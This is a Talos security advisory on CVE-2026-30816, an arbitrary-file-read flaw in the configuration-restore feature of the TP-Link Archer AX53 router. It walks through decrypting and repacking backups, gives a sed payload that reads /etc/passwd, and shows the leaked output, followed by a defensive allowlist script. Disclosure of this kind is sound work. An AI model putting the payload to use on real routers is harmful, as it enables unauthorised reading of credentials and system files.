Talos Vulnerability Report

TALOS-2025-2304

Tp-Link Archer AX53 v1.0 configuration restore crt.sed vulnerability

May 7, 2026

CVE Number

CVE-2026-30816

SUMMARY

An external config control vulnerability exists in the OpenVPN configuration restore crt.sed functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary file reading. An attacker can upload a malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553)

PRODUCT URLS

Archer AX53 v1.0 - https://www.tp-link.com/my/support/download/archer-ax53/

CVSSv3 SCORE

6.8 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-73 - External Control of File Name or Path

DETAILS

The TP-Link Archer AX53 AX3000 Dual Band Gigabit Wi-Fi 6 Router is currently among the most popular routers sold online, and boasts impressive gigabit speeds for the price. This router also features remote cloud access via the TP-Link HomeShield application and smart home functionality.

A long-standing feature of TP-Link routers, and of most routers in general, is the ability to back up the router configuration into a file, which can then be re-uploaded to the device to restore the router to a particular operational state. On the TP-Link AX3000, this functionality is accessed via the Web GUI by navigating to the ‘Advanced > System’ menu. Upon hitting the ‘Back Up’ button, the browser will download a file called ArcherAX53v120241120131n.bin. As described in a previously disclosed vulnerability on an older model of TP-Link routers (https://github.com/aaronsvk/CVE-2022-30075), this binary blob must first be decrypted with a static AES key and IV, then unpacked as a gzip archive. Unpacking the resulting tar file yields two files with actual contents: ori-backup-user-config.bin and ori-backup-certificate.bin. We then unpack these two files in exactly the same manner, first decrypting with the same AES key and IV and then unpacking the decrypted binary as a gzip file. For ori-backup-user-config.bin we end up with a human-readable config.xml file. This configuration XML can be edited and then repacked by reversing the process to manually change the configuration of the device.

If we focus on the ori-backup-certificate.bin file, decrypt it, and then unpack the result as a gzip file, we’re left with a tar archive that we can unpack to see the following files:

-rw-------  1261 2025-08-05 13:00 ./ca.crt
-rw-r--r--  144 2025-08-05 13:00 ./client.conf
-rw-------  3707 2025-08-05 13:00 ./client.crt
-rw-------  916 2025-08-05 13:00 ./client.key
-rw-------  245 2025-08-05 13:00 ./dh1024.pem
-rw-------  3725 2025-08-05 13:00 ./server.crt
-rw-------  916 2025-08-05 13:00 ./server.key

Those with VPN knowledge will probably recognize these as files commonly used by OpenVPN, and we can find this exact directory layout inside /etc/openvpn/ on the device. If one includes arbitrary files inside this unpacked tarball and repacks everything correctly, the updated or new files appear inside /etc/openvpn on the device. Curiously, if we examine this directory on the device, we see an extra file:

-rw-------    1 admin    1000          1261 Aug  6  2025 ca.crt
-rw-r--r--    1 admin    1000          4038 Nov 20 00:03 client.conf
-rw-------    1 admin    1000          3707 Aug  6  2025 client.crt
-rw-------    1 admin    1000           916 Aug  6  2025 client.key
-rw-rw-r--    1 admin    1000           311 Dec  2  2025 crt.sed     // [1]
-rw-------    1 admin    1000           245 Aug  6  2025 dh1024.pem
-rw-------    1 admin    1000          3725 Aug  6  2025 server.crt
-rw-------    1 admin    1000           916 Aug  6  2025 server.key

At [1] we see a crt.sed file that gets left out of the backed-up OpenVPN config. Its contents are as follows:

:begin
/Certificate:/,/-----BEGIN CERTIFICATE/ {
        /-----BEGIN CERTIFICATE/! {
                $! {
                        N;
                        b begin
                }
        }
        s/Certificate.*-----BEGIN CERTIFICATE/-----BEGIN CERTIFICATE/;
}

This appears to be a sed script used somewhere in the OpenVPN functionality. If we grep for crt.sed on the filesystem, we find it referenced in ./usr/sbin/build-ovpn-crt, in the following section:

client_config()
{
    // [...]
    config_load openvpn
    config_get dev "$secname" dev
    config_get proto "$secname" proto
    config_get port "$secname" port
    config_get cipher "$secname" cipher
    config_get persist_key "$secname" persist_key
    config_get auth_user_pass "$secname" auth_user_pass_verify

    : > $clnt_conf
    append_param "$clnt_conf" "client"
    append_param "$clnt_conf" "dev $dev"
    append_param "$clnt_conf" "proto $proto"
    append_param "$clnt_conf" "float"
    append_param "$clnt_conf" "nobind"
    append_param "$clnt_conf" "cipher $cipher"
    append_param "$clnt_conf" "comp-lzo adaptive"
    append_param "$clnt_conf" "resolv-retry infinite"
    append_param "$clnt_conf" "remote-cert-tls $secname"

    // [...]

    # root certificate
    echo "<ca>" >> $clnt_conf
    cat $OPENVPN_DIR/ca.crt >> $clnt_conf
    echo "</ca>" >> $clnt_conf
    # client certificate 
    echo "<cert>" >> $clnt_conf
    sed -f $OPENVPN_DIR/crt.sed $OPENVPN_DIR/client.crt >> $clnt_conf  // [2]
    echo "</cert>" >> $clnt_conf
    # client private key
    echo "<key>" >> $clnt_conf
    cat $OPENVPN_DIR/client.key >> $clnt_conf
    echo "</key>" >> $clnt_conf
}

At [2] we can clearly see that this file gets treated as a sed script that is run to help generate a client certificate for the user when they want to connect to the OpenVPN server. The ./usr/sbin/build-ovpn-crt script can be run via the Web GUI by hitting the ‘Advanced > VPN Server > OpenVPN > EXPORT’ button. With all that in mind, the question becomes “What can I do with this?” Since the busybox binary on the router does not have GNU extensions enabled, we cannot run arbitrary commands, but with a little knowledge of sed scripting, we can modify the sed script by adding something like the following:

/----END CERTIFICATE/{
  r /etc/passwd
  p
}

The above lines cause /etc/passwd to be read into the buffer and printed out. Any number of additional files can be added in the same way, allowing any file on the file system to be read into the exported client OpenVPN configuration:

client
dev tun
proto tcp
float
nobind
cipher AES-128-CBC
comp-lzo adaptive
resolv-retry infinite
remote-cert-tls server
persist-key
remote 1194
<ca>
-----BEGIN CERTIFICATE-----
// [...]
-----END CERTIFICATE-----
</ca>

<cert>
-----BEGIN CERTIFICATE-----
// [...]
-----END CERTIFICATE-----
-----END CERTIFICATE-----
root:x:0:0:root:/root:/bin/ash
sftpadmin:x:1001:0:sftpadmin:/var:/bin/false
visit::2001:65534:visit:/var:/bin/false
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
admin:x:1000:0:admin:/var:/bin/false
guest::2000:65534:guest:/var:/bin/false
</cert>
<key>
-----BEGIN PRIVATE KEY-----
// [...]
-----END PRIVATE KEY-----
</key>
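
The two controls this finding points to, as an added example that is not code from the firmware or from Talos: an allowlist for restored archive members built from the seven file names in the backup listing above, and certificate export that uses a fixed inline sed expression instead of sed -f on a file in /etc/openvpn. The function names are hypothetical, and the inline expression is a substitute for crt.sed that emits only the PEM block.

```shell
#!/bin/sh
# Added example, not TP-Link or Talos code. Function names are hypothetical.

# Files the report lists in the certificate backup; nothing else is restored.
ALLOWED_MEMBERS="ca.crt client.conf client.crt client.key dh1024.pem server.crt server.key"

# Return 0 only for an expected file name sitting directly in the archive root.
restore_member_allowed() {
    name=${1#./}
    case "$name" in
        ""|*/*|*..*) return 1 ;;    # empty, nested path, or traversal
    esac
    for ok in $ALLOWED_MEMBERS; do
        [ "$name" = "$ok" ] && return 0
    done
    return 1
}

# Read a `tar -tf` style listing on stdin, print each refused member and
# return 1 if any was refused. Names only: member types (symlinks, devices)
# still need a separate check before extraction.
check_restore_listing() {
    bad=0
    while IFS= read -r member; do
        [ "$member" = "./" ] && continue
        if ! restore_member_allowed "$member"; then
            printf 'rejected: %s\n' "$member"
            bad=1
        fi
    done
    return "$bad"
}

# Emit only the PEM block of a certificate with a fixed inline expression,
# so no sed script is ever loaded from the restorable directory.
emit_client_cert() {
    sed -n '/^-----BEGIN CERTIFICATE-----/,/^-----END CERTIFICATE-----/p' "$1"
}
```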

VENDOR RESPONSE

Vendor advisory: https://www.tp-link.com/us/support/faq/5055/

TIMELINE

2026-01-12 - Vendor Disclosure
2026-04-08 - Vendor Patch Release
2026-05-07 - Public Release

Credit

Discovered by Lilith >_> of Cisco Talos.